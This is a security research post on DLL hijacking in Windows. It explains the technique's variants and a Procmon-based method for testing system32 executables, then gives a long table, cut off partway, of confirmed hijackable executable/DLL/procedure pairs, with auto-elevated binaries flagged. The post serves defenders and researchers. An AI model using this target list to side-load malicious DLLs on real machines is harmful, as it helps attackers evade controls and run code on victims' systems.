DLL Hijacking
First of all, let’s get the definition out of the way. DLL hijacking is, in the broadest sense, tricking a legitimate/trusted application into loading an arbitrary DLL. Terms such as DLL Search Order Hijacking , DLL Load Order Hijacking , DLL Spoofing , DLL Injection and DLL Side-Loading are often -mistakenly- used to say the same. At best such terms describe specific cases of DLL hijacking, but are often used interchangeably and therefore incorrectly. As an umbrella term, DLL hijacking is more accurate, as DLL hijacking always involves a DLL taking over from a legitimate DLL.
Attackers have been seen to use DLL hijacking in different ways and for different reasons. Motives include execution (executing malicious code through a trusted executable may be less likely to set off alarm bells, and in some cases even bypasses application whitelist features such as AppLocker [ 1 ]), obtaining persistence (if the target application is pre-installed and runs regularly, so will the malicious code) and privilege escalation (if the target application runs under elevated permissions, so will the malicious code).
There is a variety of approaches to choose from, with success depending on how the application is configured to load its required DLLs. Possible approaches include:
- DLL replacement : replace a legitimate DLL with an evil DLL. This can be combined with DLL Proxying [ 2 ], which ensures all functionality of the original DLL remains intact.
- DLL search order hijacking : DLLs specified by an application without a path are searched for in fixed locations in a specific order [ 3 ]. Hijacking the search order takes place by putting the evil DLL in a location that is searched in before the actual DLL. This sometimes includes the working directory of the target application.
- Phantom DLL hijacking : drop an evil DLL in place of a missing/non-existing DLL that a legitimate application tries to load [ 4 ].
- DLL redirection : change the location in which the DLL is searched for, e.g. by editing the
%PATH%
environment variable, or .exe.manifest
/ .exe.local
files to include the folder containing the evil DLL [ 5 , 6 ] .
- WinSxS DLL replacement : replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often referred to as DLL side-loading [ 7 ].
- Relative path DLL Hijacking: copy (and optionally rename) the legitimate application to a user-writeable folder, alongside the evil DLL. In the way this is used, it has similarities with (Signed) Binary Proxy Execution [ 8 ]. A variation of this is (somewhat oxymoronically called) ‘ bring your own LOLbin ’ [ 9 ] in which the legitimate application is brought with the evil DLL (rather than copied from the legitimate location on the victim’s machine).
Finding vulnerable executables
The biggest challenge is to find a vulnerable executable that can be exploited under default user permissions. When targeting pre-installed system executables on Windows, that typically excludes the first option, whilst any folders eligible in options 2 and 3 have to be user writeable, as should the the files and folder in options 4 and 5. This is usually not the case.
That leaves us with option six, the weakest variant, which the remainder of this post will focus on. Although usually unsuitable to obtain persistence or privilege escalation, it is often seen in the wild. Take OceanLotus/APT32, who at the end of 2019 have been observed to use a legitimate rekeywiz.exe
alongside a malicious duser.dll
[ 10 , 11 ]. In this case, the malware embedded the legitimate software and dropped it to disk, adopting the ‘ bring your own LOLbin ’ approach (another way of achieving the same would have been to copy the legitimate executable from the \system32\
folder, assuming the executable hasn’t been patched yet).
To prevent new versions of this technique to be successful, it is worthwhile identifying executables that are vulnerable to this kind of DLL hijacking. This will provide red teamers with new means for execution, but more importantly, it will allow threat hunters and defenders to take appropriate measures to detect and prevent.
Approach
To keep things focussed, let’s limit ourselves to the executables present by default in c:\windows\system32\
. On the tested Windows 10 v1909 instance, this comprised a total of 616 executables, or 613 if you only consider signed applications.
To monitor which DLLs each process attempts to load, we’ll use the well-known Procmon [ 12 ] tool. The approach taken is therefore: (1) copy trusted executable to a user-writable location; (2) run copied executable; (3) use Procmon to identify DLLs looked for in user writable location.
Procmon capturing DLL queries by a copy of winsat.exe, located in c:\users\wietze\downloads\
.
This allows us to identify all DLLs queried by each application, which will be all potential hijackable DLL candidates. But it does not automatically follow that all of these are also loaded (and therefore executed). The most reliable way to find out which DLLs are properly loaded, is to compile our own version of the DLL, and make it write to a unique file upon successfully loading. If we then repeat the above approach for all target executables and DLLs, it will result in a collection of files that tells us which DLLs are confirmed vulnerable to DLL hijacking.
Compiling custom versions of existing DLLs is more challenging than it may sound, as a lot of executables will not load such DLLs if procedures or entry points are missing. Tools such as DLL Export Viewer [ 13 ] can be used to enumerate all external function names and ordinals of the legitimate DLLs. Ensuring that our compiled DLL follows the same format will maximise the chances of it being loaded successfully.
Sample C code for our own version of dxgi.dll, which showed up in the Procmon recording of winsat.exe.
In summary, the approach taken is:
![3Anaym6.png!web](https://img0.tuicool.com/3Anaym6.png!web)
The full code with a more thorough, technical explanation can be found on GitHub [ 14 ].
Confirmed DLL Hijack candidates
The following table lists all executables in c:\windows\system32
on Windows 10 v1909 that are vulnerable to the ‘relative path DLL Hijack’ variant of DLL Hijacking. Next to each executable is one or more DLLs that can be hijacked, together with the procedures of that DLL that are called. As explained in the previous section, these are not mere theoretical targets, these are tested and confirmed to be working . The list comprises 287 executables and 263 unique DLLs.
Auto-elevated
Executable
DLL
Procedure
:heavy_check_mark:
bthudtask.exe
DEVOBJ.dll
DllMain
:heavy_check_mark:
computerdefaults.exe
CRYPTBASE.DLL
DllMain
:heavy_check_mark:
computerdefaults.exe
edputil.dll
DllMain
:heavy_check_mark:
computerdefaults.exe
edputil.dll
EdpGetIsManaged
:heavy_check_mark:
computerdefaults.exe
MLANG.dll
ConvertINetUnicodeToMultiByte
:heavy_check_mark:
computerdefaults.exe
MLANG.dll
DllMain
:heavy_check_mark:
computerdefaults.exe
PROPSYS.dll
DllMain
:heavy_check_mark:
computerdefaults.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:heavy_check_mark:
computerdefaults.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:heavy_check_mark:
computerdefaults.exe
Secur32.dll
DllMain
:heavy_check_mark:
computerdefaults.exe
SSPICLI.DLL
DllMain
:heavy_check_mark:
computerdefaults.exe
SSPICLI.DLL
GetUserNameExW
:heavy_check_mark:
computerdefaults.exe
WININET.dll
DllMain
:heavy_check_mark:
computerdefaults.exe
WININET.dll
GetUrlCacheEntryBinaryBlob
:heavy_check_mark:
dccw.exe
ColorAdapterClient.dll
DllMain
:heavy_check_mark:
dccw.exe
dxva2.dll
DllMain
:heavy_check_mark:
dccw.exe
mscms.dll
DccwReleaseDisplayProfileAssociationList
:heavy_check_mark:
dccw.exe
mscms.dll
DllMain
:heavy_check_mark:
dccw.exe
mscms.dll
WcsGetCalibrationManagementState
:heavy_check_mark:
dccw.exe
mscms.dll
WcsSetCalibrationManagementState
:heavy_check_mark:
dccw.exe
USERENV.dll
DllMain
:heavy_check_mark:
easinvoker.exe
AUTHZ.dll
DllMain
:heavy_check_mark:
easinvoker.exe
netutils.dll
DllMain
:heavy_check_mark:
easinvoker.exe
samcli.dll
DllMain
:heavy_check_mark:
easinvoker.exe
SAMLIB.dll
DllMain
:heavy_check_mark:
easpolicymanagerbrokerhost.exe
InprocLogger.dll
DllMain
:heavy_check_mark:
easpolicymanagerbrokerhost.exe
InprocLogger.dll
FlushInProcTraceSession
:heavy_check_mark:
easpolicymanagerbrokerhost.exe
InprocLogger.dll
InitializeInProcLogger
:heavy_check_mark:
easpolicymanagerbrokerhost.exe
InprocLogger.dll
InitializeInProcTraceFlushTrigger
:heavy_check_mark:
easpolicymanagerbrokerhost.exe
InprocLogger.dll
InitializeInProcTraceSession
:heavy_check_mark:
easpolicymanagerbrokerhost.exe
InprocLogger.dll
ShutdownInProcLogger
:heavy_check_mark:
easpolicymanagerbrokerhost.exe
InprocLogger.dll
ShutdownInProcTraceSession
:heavy_check_mark:
easpolicymanagerbrokerhost.exe
InprocLogger.dll
StopInProcTraceSession
:heavy_check_mark:
easpolicymanagerbrokerhost.exe
policymanager.dll
DllMain
:heavy_check_mark:
fodhelper.exe
CRYPTBASE.DLL
DllMain
:heavy_check_mark:
fodhelper.exe
edputil.dll
DllMain
:heavy_check_mark:
fodhelper.exe
edputil.dll
EdpGetIsManaged
:heavy_check_mark:
fodhelper.exe
MLANG.dll
ConvertINetUnicodeToMultiByte
:heavy_check_mark:
fodhelper.exe
MLANG.dll
DllMain
:heavy_check_mark:
fodhelper.exe
PROPSYS.dll
DllMain
:heavy_check_mark:
fodhelper.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:heavy_check_mark:
fodhelper.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:heavy_check_mark:
fodhelper.exe
Secur32.dll
DllMain
:heavy_check_mark:
fodhelper.exe
SSPICLI.DLL
DllMain
:heavy_check_mark:
fodhelper.exe
SSPICLI.DLL
GetUserNameExW
:heavy_check_mark:
fodhelper.exe
WININET.dll
DllMain
:heavy_check_mark:
fodhelper.exe
WININET.dll
GetUrlCacheEntryBinaryBlob
:heavy_check_mark:
fsavailux.exe
DEVOBJ.dll
DllMain
:heavy_check_mark:
fxsunatd.exe
FXSAPI.dll
DllMain
:heavy_check_mark:
fxsunatd.exe
FXSAPI.dll
FaxConnectFaxServerW
:heavy_check_mark:
fxsunatd.exe
IPHLPAPI.DLL
DllMain
:heavy_check_mark:
fxsunatd.exe
PROPSYS.dll
DllMain
:heavy_check_mark:
immersivetpmvscmgrsvr.exe
DEVOBJ.dll
DllMain
:heavy_check_mark:
iscsicli.exe
DEVOBJ.dll
DllMain
:heavy_check_mark:
iscsicli.exe
ISCSIDSC.dll
DllMain
:heavy_check_mark:
iscsicli.exe
ISCSIDSC.dll
GetIScsiVersionInformation
:heavy_check_mark:
iscsicli.exe
ISCSIUM.dll
DiscpAllocMemory
:heavy_check_mark:
iscsicli.exe
ISCSIUM.dll
DiscpRegisterHeap
:heavy_check_mark:
iscsicli.exe
ISCSIUM.dll
DllMain
:heavy_check_mark:
iscsicli.exe
WMICLNT.dll
DllMain
:heavy_check_mark:
mdsched.exe
bcd.dll
DllMain
:heavy_check_mark:
mschedexe.exe
MaintenanceUI.dll
DllMain
:heavy_check_mark:
msconfig.exe
ATL.DLL
AtlModuleInit
:heavy_check_mark:
msconfig.exe
ATL.DLL
AtlModuleRegisterClassObjects
:heavy_check_mark:
msconfig.exe
ATL.DLL
DllMain
:heavy_check_mark:
msconfig.exe
bcd.dll
DllMain
:heavy_check_mark:
msdt.exe
ATL.DLL
DllMain
:heavy_check_mark:
msdt.exe
Cabinet.dll
DllMain
:heavy_check_mark:
msdt.exe
SSPICLI.DLL
DllMain
:heavy_check_mark:
msdt.exe
UxTheme.dll
DllMain
:heavy_check_mark:
msdt.exe
wer.dll
DllMain
:heavy_check_mark:
msdt.exe
WINHTTP.dll
DllMain
:heavy_check_mark:
multidigimon.exe
NInput.dll
DllMain
:heavy_check_mark:
netplwiz.exe
CRYPTBASE.dll
DllMain
:heavy_check_mark:
netplwiz.exe
DSROLE.dll
DllMain
:heavy_check_mark:
netplwiz.exe
DSROLE.dll
DsRoleGetPrimaryDomainInformation
:heavy_check_mark:
netplwiz.exe
NETPLWIZ.dll
DllMain
:heavy_check_mark:
netplwiz.exe
NETPLWIZ.dll
UsersRunDllW
:heavy_check_mark:
netplwiz.exe
netutils.dll
DllMain
:heavy_check_mark:
netplwiz.exe
netutils.dll
NetApiBufferFree
:heavy_check_mark:
netplwiz.exe
PROPSYS.dll
DllMain
:heavy_check_mark:
netplwiz.exe
samcli.dll
DllMain
:heavy_check_mark:
netplwiz.exe
samcli.dll
NetUserGetInfo
:heavy_check_mark:
netplwiz.exe
SAMLIB.dll
DllMain
:heavy_check_mark:
netplwiz.exe
SAMLIB.dll
SamConnect
:heavy_check_mark:
netplwiz.exe
SAMLIB.dll
SamEnumerateDomainsInSamServer
:heavy_check_mark:
netplwiz.exe
SAMLIB.dll
SamFreeMemory
:heavy_check_mark:
optionalfeatures.exe
DUI70.dll
DllMain
:heavy_check_mark:
optionalfeatures.exe
DUI70.dll
InitProcessPriv
:heavy_check_mark:
optionalfeatures.exe
DUI70.dll
RegisterBaseControls
:heavy_check_mark:
optionalfeatures.exe
DUI70.dll
RegisterCommonControls
:heavy_check_mark:
optionalfeatures.exe
DUI70.dll
RegisterExtendedControls
:heavy_check_mark:
optionalfeatures.exe
DUI70.dll
RegisterStandardControls
:heavy_check_mark:
optionalfeatures.exe
msi.dll
DllMain
:heavy_check_mark:
optionalfeatures.exe
OLEACC.dll
CreateStdAccessibleObject
:heavy_check_mark:
optionalfeatures.exe
OLEACC.dll
DllMain
:heavy_check_mark:
optionalfeatures.exe
OLEACC.dll
GetRoleTextW
:heavy_check_mark:
optionalfeatures.exe
osbaseln.dll
CloseOsBaseline
:heavy_check_mark:
optionalfeatures.exe
osbaseln.dll
DllMain
:heavy_check_mark:
optionalfeatures.exe
osbaseln.dll
OpenOsBaseline
:heavy_check_mark:
optionalfeatures.exe
PROPSYS.dll
DllMain
:heavy_check_mark:
perfmon.exe
ATL.DLL
DllMain
:heavy_check_mark:
perfmon.exe
credui.dll
DllMain
:heavy_check_mark:
perfmon.exe
SspiCli.dll
DllMain
:heavy_check_mark:
printui.exe
IPHLPAPI.DLL
DllMain
:heavy_check_mark:
printui.exe
printui.dll
DllMain
:heavy_check_mark:
printui.exe
printui.dll
PrintUIEntryW
:heavy_check_mark:
printui.exe
PROPSYS.dll
DllMain
:heavy_check_mark:
printui.exe
puiapi.dll
DllMain
:heavy_check_mark:
recdisc.exe
bcd.dll
DllMain
:heavy_check_mark:
recdisc.exe
Cabinet.dll
DllMain
:heavy_check_mark:
recdisc.exe
ReAgent.dll
DllMain
:heavy_check_mark:
rstrui.exe
bcd.dll
DllMain
:heavy_check_mark:
rstrui.exe
ktmw32.dll
DllMain
:heavy_check_mark:
rstrui.exe
SPP.dll
DllMain
:heavy_check_mark:
rstrui.exe
SPP.dll
SxTracerGetThreadContextRetail
:heavy_check_mark:
rstrui.exe
SRCORE.dll
DllMain
:heavy_check_mark:
rstrui.exe
SRCORE.dll
SrFreeRestoreStatus
:heavy_check_mark:
rstrui.exe
VSSAPI.DLL
DllMain
:heavy_check_mark:
rstrui.exe
VssTrace.DLL
DllMain
:heavy_check_mark:
rstrui.exe
wer.dll
DllMain
:heavy_check_mark:
sdclt.exe
bcd.dll
DllMain
:heavy_check_mark:
sdclt.exe
Cabinet.dll
DllMain
:heavy_check_mark:
sdclt.exe
CLDAPI.dll
CfGetPlaceholderStateFromAttributeTag
:heavy_check_mark:
sdclt.exe
CLDAPI.dll
DllMain
:heavy_check_mark:
sdclt.exe
CRYPTBASE.DLL
DllMain
:heavy_check_mark:
sdclt.exe
edputil.dll
DllMain
:heavy_check_mark:
sdclt.exe
edputil.dll
EdpGetIsManaged
:heavy_check_mark:
sdclt.exe
FLTLIB.DLL
DllMain
:heavy_check_mark:
sdclt.exe
PROPSYS.dll
DllMain
:heavy_check_mark:
sdclt.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:heavy_check_mark:
sdclt.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:heavy_check_mark:
sdclt.exe
ReAgent.dll
DllMain
:heavy_check_mark:
sdclt.exe
SPP.dll
DllMain
:heavy_check_mark:
sdclt.exe
SPP.dll
SxTracerGetThreadContextRetail
:heavy_check_mark:
sdclt.exe
SspiCli.dll
DllMain
:heavy_check_mark:
sdclt.exe
SspiCli.dll
GetUserNameExW
:heavy_check_mark:
sdclt.exe
UxTheme.dll
DllMain
:heavy_check_mark:
sdclt.exe
VSSAPI.DLL
DllMain
:heavy_check_mark:
sdclt.exe
VssTrace.DLL
DllMain
:heavy_check_mark:
sdclt.exe
wer.dll
DllMain
:heavy_check_mark:
sdclt.exe
WTSAPI32.dll
DllMain
:heavy_check_mark:
systempropertiesadvanced.exe
bcd.dll
DllMain
:heavy_check_mark:
systempropertiesadvanced.exe
credui.dll
DllMain
:heavy_check_mark:
systempropertiesadvanced.exe
DNSAPI.dll
DllMain
:heavy_check_mark:
systempropertiesadvanced.exe
DSROLE.DLL
DllMain
:heavy_check_mark:
systempropertiesadvanced.exe
DSROLE.DLL
DsRoleGetPrimaryDomainInformation
:heavy_check_mark:
systempropertiesadvanced.exe
LOGONCLI.DLL
DllMain
:heavy_check_mark:
systempropertiesadvanced.exe
netid.dll
CreateNetIDPropertyPage
:heavy_check_mark:
systempropertiesadvanced.exe
netid.dll
DllMain
:heavy_check_mark:
systempropertiesadvanced.exe
NETUTILS.DLL
DllMain
:heavy_check_mark:
systempropertiesadvanced.exe
SRVCLI.DLL
DllMain
:heavy_check_mark:
systempropertiesadvanced.exe
WINBRAND.dll
DllMain
:heavy_check_mark:
systempropertiesadvanced.exe
WINSTA.dll
DllMain
:heavy_check_mark:
systempropertiesadvanced.exe
WKSCLI.DLL
DllMain
:heavy_check_mark:
systempropertiescomputername.exe
bcd.dll
DllMain
:heavy_check_mark:
systempropertiescomputername.exe
WINSTA.dll
DllMain
:heavy_check_mark:
systempropertiesdataexecutionprevention.exe
bcd.dll
DllMain
:heavy_check_mark:
systempropertiesdataexecutionprevention.exe
WINSTA.dll
DllMain
:heavy_check_mark:
systempropertieshardware.exe
bcd.dll
DllMain
:heavy_check_mark:
systempropertieshardware.exe
WINSTA.dll
DllMain
:heavy_check_mark:
systempropertiesprotection.exe
bcd.dll
DllMain
:heavy_check_mark:
systempropertiesprotection.exe
WINSTA.dll
DllMain
:heavy_check_mark:
systempropertiesremote.exe
bcd.dll
DllMain
:heavy_check_mark:
systempropertiesremote.exe
WINSTA.dll
DllMain
:heavy_check_mark:
systemreset.exe
bcd.dll
BcdCloseObject
:heavy_check_mark:
systemreset.exe
bcd.dll
BcdCloseStore
:heavy_check_mark:
systemreset.exe
bcd.dll
BcdFlushStore
:heavy_check_mark:
systemreset.exe
bcd.dll
BcdGetElementData
:heavy_check_mark:
systemreset.exe
bcd.dll
BcdOpenObject
:heavy_check_mark:
systemreset.exe
bcd.dll
BcdOpenStore
:heavy_check_mark:
systemreset.exe
bcd.dll
DllMain
:heavy_check_mark:
systemreset.exe
Cabinet.dll
DllMain
:heavy_check_mark:
systemreset.exe
d3d10warp.dll
DllMain
:heavy_check_mark:
systemreset.exe
d3d10warp.dll
OpenAdapter10_2
:heavy_check_mark:
systemreset.exe
d3d11.dll
D3D11CreateDevice
:heavy_check_mark:
systemreset.exe
d3d11.dll
DllMain
:heavy_check_mark:
systemreset.exe
dbgcore.DLL
DllMain
:heavy_check_mark:
systemreset.exe
DismApi.DLL
DllMain
:heavy_check_mark:
systemreset.exe
dxgi.dll
CreateDXGIFactory1
:heavy_check_mark:
systemreset.exe
dxgi.dll
DllMain
:heavy_check_mark:
systemreset.exe
FVEAPI.dll
DllMain
:heavy_check_mark:
systemreset.exe
FVEAPI.dll
FveGetStatus
:heavy_check_mark:
systemreset.exe
FVEAPI.dll
FveOpenVolumeW
:heavy_check_mark:
systemreset.exe
ReAgent.dll
DllMain
:heavy_check_mark:
systemreset.exe
ReAgent.dll
WinReGetConfig
:heavy_check_mark:
systemreset.exe
ResetEngine.dll
DllMain
:heavy_check_mark:
systemreset.exe
ResetEngine.dll
ResetCreateSession
:heavy_check_mark:
systemreset.exe
ResetEngine.dll
ResetReleaseSession
:heavy_check_mark:
systemreset.exe
ResetEngine.dll
ResetTraceClientInfo
:heavy_check_mark:
systemreset.exe
ResetEngine.dll
ResetValidateScenario
:heavy_check_mark:
systemreset.exe
tbs.dll
DllMain
:heavy_check_mark:
systemreset.exe
VSSAPI.DLL
DllMain
:heavy_check_mark:
systemreset.exe
VssTrace.DLL
DllMain
:heavy_check_mark:
systemreset.exe
WDSCORE.dll
ConstructPartialMsgVW
:heavy_check_mark:
systemreset.exe
WDSCORE.dll
CurrentIP
:heavy_check_mark:
systemreset.exe
WDSCORE.dll
DllMain
:heavy_check_mark:
systemreset.exe
WDSCORE.dll
WdsInitialize
:heavy_check_mark:
systemreset.exe
WDSCORE.dll
WdsSetupLogMessageW
:heavy_check_mark:
systemreset.exe
WIMGAPI.DLL
DllMain
:heavy_check_mark:
systemreset.exe
WIMGAPI.DLL
WIMCreateFile
:heavy_check_mark:
systemreset.exe
WINHTTP.dll
DllMain
:heavy_check_mark:
systemreset.exe
WOFUTIL.dll
DllMain
:heavy_check_mark:
systemreset.exe
XmlLite.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
AppXDeploymentClient.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
Bcp47Langs.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
DEVRTL.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
DismApi.DLL
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
DNSAPI.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
FirewallAPI.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
fwbase.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
fwbase.dll
FwCriticalSectionCreate
:heavy_check_mark:
systemsettingsadminflows.exe
fwbase.dll
FwCriticalSectionDestroy
:heavy_check_mark:
systemsettingsadminflows.exe
logoncli.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
netutils.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
newdev.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
PROPSYS.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
samcli.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
SspiCli.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
StateRepository.Core.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
SystemSettingsThresholdAdminFlowUI.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
timesync.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
USERENV.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
WINBRAND.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
wkscli.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
Wldp.dll
DllMain
:heavy_check_mark:
systemsettingsadminflows.exe
WTSAPI32.dll
DllMain
:heavy_check_mark:
taskmgr.exe
credui.dll
DllMain
:heavy_check_mark:
taskmgr.exe
d3d11.dll
DllMain
:heavy_check_mark:
taskmgr.exe
d3d12.dll
DllMain
:heavy_check_mark:
taskmgr.exe
dxgi.dll
DllMain
:heavy_check_mark:
taskmgr.exe
pdh.dll
DllMain
:heavy_check_mark:
taskmgr.exe
UxTheme.dll
DllMain
:heavy_check_mark:
tcmsetup.exe
TAPI32.dll
DllMain
:heavy_check_mark:
winsat.exe
d3d10_1.dll
DllMain
:heavy_check_mark:
winsat.exe
d3d10_1core.dll
DllMain
:heavy_check_mark:
winsat.exe
d3d10.dll
DllMain
:heavy_check_mark:
winsat.exe
d3d10core.dll
DllMain
:heavy_check_mark:
winsat.exe
d3d11.dll
DllMain
:heavy_check_mark:
winsat.exe
dxgi.dll
DllMain
:heavy_check_mark:
winsat.exe
winmm.dll
DllMain
:heavy_check_mark:
wsreset.exe
licensemanagerapi.dll
DllMain
:heavy_check_mark:
wsreset.exe
licensemanagerapi.dll
Reset
:heavy_check_mark:
wsreset.exe
wevtapi.dll
DllMain
:heavy_check_mark:
wusa.exe
dpx.dll
DllMain
:heavy_check_mark:
wusa.exe
WTSAPI32.dll
DllMain
:x:
agentservice.exe
ACTIVEDS.dll
DllMain
:x:
agentservice.exe
adsldpc.dll
DllMain
:x:
agentservice.exe
FLTLIB.DLL
DllMain
:x:
applytrustoffline.exe
mintdh.dll
DllMain
:x:
applytrustoffline.exe
mintdh.dll
TdhpSetWbemExtensionBlock
:x:
applytrustoffline.exe
StateRepository.Core.dll
DllMain
:x:
arp.exe
IPHLPAPI.DLL
DllMain
:x:
arp.exe
snmpapi.dll
DllMain
:x:
at.exe
cryptdll.dll
DllMain
:x:
at.exe
netutils.dll
DllMain
:x:
at.exe
NtlmShared.dll
DllMain
:x:
at.exe
schedcli.dll
DllMain
:x:
at.exe
schedcli.dll
NetScheduleJobEnum
:x:
at.exe
sspicli.dll
DllMain
:x:
at.exe
sspicli.dll
InitSecurityInterfaceW
:x:
auditpol.exe
auditpolcore.dll
AdtEnableSinglePrivilege
:x:
auditpol.exe
auditpolcore.dll
AuditPolicyData_DeleteAuditDataInstance
:x:
auditpol.exe
auditpolcore.dll
DllMain
:x:
auditpol.exe
auditpolcore.dll
LoadFormatStringAndPrintToConsole
:x:
baaupdate.exe
FVEAPI.dll
DllMain
:x:
bdechangepin.exe
FVEAPI.dll
DllMain
:x:
bdechangepin.exe
FVEAPI.dll
FveGetAuthMethodInformation
:x:
bdechangepin.exe
FVEAPI.dll
FveGetStatus
:x:
bdechangepin.exe
FVEAPI.dll
FveOpenVolumeW
:x:
bdeuisrv.exe
USERENV.dll
DllMain
:x:
bdeuisrv.exe
WTSAPI32.dll
DllMain
:x:
bioiso.exe
iumbase.DLL
DllMain
:x:
bootim.exe
bcd.dll
BcdGetElementData
:x:
bootim.exe
bcd.dll
BcdOpenObject
:x:
bootim.exe
bcd.dll
BcdOpenSystemStore
:x:
bootim.exe
bcd.dll
BcdQueryObject
:x:
bootim.exe
bcd.dll
DllMain
:x:
bootim.exe
BootMenuUX.DLL
CreateBareMetalRecoveryButton
:x:
bootim.exe
BootMenuUX.DLL
CreateBootableOSButtonCollection
:x:
bootim.exe
BootMenuUX.DLL
CreateCloudRecoveryButton
:x:
bootim.exe
BootMenuUX.DLL
CreateDefaultOSButton
:x:
bootim.exe
BootMenuUX.DLL
CreateDeviceListButton
:x:
bootim.exe
BootMenuUX.DLL
CreateDirectFactoryResetButton
:x:
bootim.exe
BootMenuUX.DLL
CreateOSListButton
:x:
bootim.exe
BootMenuUX.DLL
CreateRecoveryToolsListButton
:x:
bootim.exe
BootMenuUX.DLL
CreateSelectOSPage
:x:
bootim.exe
BootMenuUX.DLL
CreateShutdownButton
:x:
bootim.exe
BootMenuUX.DLL
DllMain
:x:
bootim.exe
Cabinet.dll
DllMain
:x:
bootim.exe
dbghelp.dll
DllMain
:x:
bootim.exe
DismApi.DLL
DllMain
:x:
bootim.exe
FLTLIB.DLL
DllMain
:x:
bootim.exe
OLEACC.dll
DllMain
:x:
bootim.exe
OLEACC.dll
GetRoleTextW
:x:
bootim.exe
PROPSYS.dll
DllMain
:x:
bootim.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:x:
bootim.exe
ReAgent.dll
DllMain
:x:
bootim.exe
ReAgent.dll
WinReGetConfig
:x:
bootim.exe
ResetEng.dll
DllMain
:x:
bootim.exe
tbs.dll
DllMain
:x:
bootim.exe
VirtDisk.dll
DllMain
:x:
bootim.exe
VSSAPI.DLL
DllMain
:x:
bootim.exe
VssTrace.DLL
DllMain
:x:
bootim.exe
WDSCORE.dll
ConstructPartialMsgVW
:x:
bootim.exe
WDSCORE.dll
CurrentIP
:x:
bootim.exe
WDSCORE.dll
DllMain
:x:
bootim.exe
WDSCORE.dll
WdsSetupLogMessageW
:x:
calc.exe
CRYPTBASE.DLL
DllMain
:x:
calc.exe
edputil.dll
DllMain
:x:
calc.exe
edputil.dll
EdpGetIsManaged
:x:
calc.exe
MLANG.dll
ConvertINetUnicodeToMultiByte
:x:
calc.exe
MLANG.dll
DllMain
:x:
calc.exe
PROPSYS.dll
DllMain
:x:
calc.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:x:
calc.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:x:
calc.exe
Secur32.dll
DllMain
:x:
calc.exe
SSPICLI.DLL
DllMain
:x:
calc.exe
SSPICLI.DLL
GetUserNameExW
:x:
calc.exe
WININET.dll
DllMain
:x:
calc.exe
WININET.dll
GetUrlCacheEntryBinaryBlob
:x:
certreq.exe
cscapi.dll
CscNetApiGetInterface
:x:
certreq.exe
cscapi.dll
DllMain
:x:
certreq.exe
DUI70.dll
DllMain
:x:
certreq.exe
DUI70.dll
FlushThemeHandles
:x:
certreq.exe
DUI70.dll
InitProcessPriv
:x:
certreq.exe
DUI70.dll
InitThread
:x:
certreq.exe
dwmapi.dll
DllMain
:x:
certreq.exe
dwmapi.dll
DwmSetWindowAttribute
:x:
certreq.exe
LINKINFO.dll
DllMain
:x:
certreq.exe
LINKINFO.dll
IsValidLinkInfo
:x:
certreq.exe
SSPICLI.DLL
DllMain
:x:
certreq.exe
WindowsCodecs.dll
DllMain
:x:
certreq.exe
WindowsCodecs.dll
WICCreateImagingFactory_Proxy
:x:
certreq.exe
WININET.dll
DllMain
:x:
certreq.exe
XmlLite.dll
CreateXmlReader
:x:
certreq.exe
XmlLite.dll
CreateXmlReaderInputWithEncodingName
:x:
certreq.exe
XmlLite.dll
DllMain
:x:
certutil.exe
Cabinet.dll
DllMain
:x:
certutil.exe
CRYPTUI.dll
DllMain
:x:
certutil.exe
DSROLE.DLL
DllMain
:x:
certutil.exe
LOGONCLI.DLL
DllMain
:x:
certutil.exe
NETUTILS.DLL
DllMain
:x:
certutil.exe
NTDSAPI.dll
DllMain
:x:
certutil.exe
SAMCLI.DLL
DllMain
:x:
certutil.exe
SSPICLI.DLL
DllMain
:x:
change.exe
logoncli.dll
DllMain
:x:
change.exe
netutils.dll
DllMain
:x:
change.exe
samcli.dll
DllMain
:x:
change.exe
srvcli.dll
DllMain
:x:
change.exe
utildll.dll
DllMain
:x:
change.exe
WINSTA.dll
DllMain
:x:
charmap.exe
GetUName.dll
DllMain
:x:
charmap.exe
MSFTEDIT.DLL
DllMain
:x:
checknetisolation.exe
DNSAPI.dll
DllMain
:x:
checknetisolation.exe
FirewallAPI.dll
DllMain
:x:
checknetisolation.exe
fwbase.dll
DllMain
:x:
checknetisolation.exe
fwbase.dll
FwAlloc
:x:
checknetisolation.exe
fwbase.dll
FwCriticalSectionCreate
:x:
checknetisolation.exe
fwbase.dll
FwCriticalSectionDestroy
:x:
checknetisolation.exe
fwbase.dll
FwFree
:x:
checknetisolation.exe
fwpuclnt.dll
DllMain
:x:
chglogon.exe
logoncli.dll
DllMain
:x:
chglogon.exe
netutils.dll
DllMain
:x:
chglogon.exe
REGAPI.dll
DllMain
:x:
chglogon.exe
samcli.dll
DllMain
:x:
chglogon.exe
srvcli.dll
DllMain
:x:
chglogon.exe
utildll.dll
DllMain
:x:
chglogon.exe
WINSTA.dll
DllMain
:x:
chgport.exe
logoncli.dll
DllMain
:x:
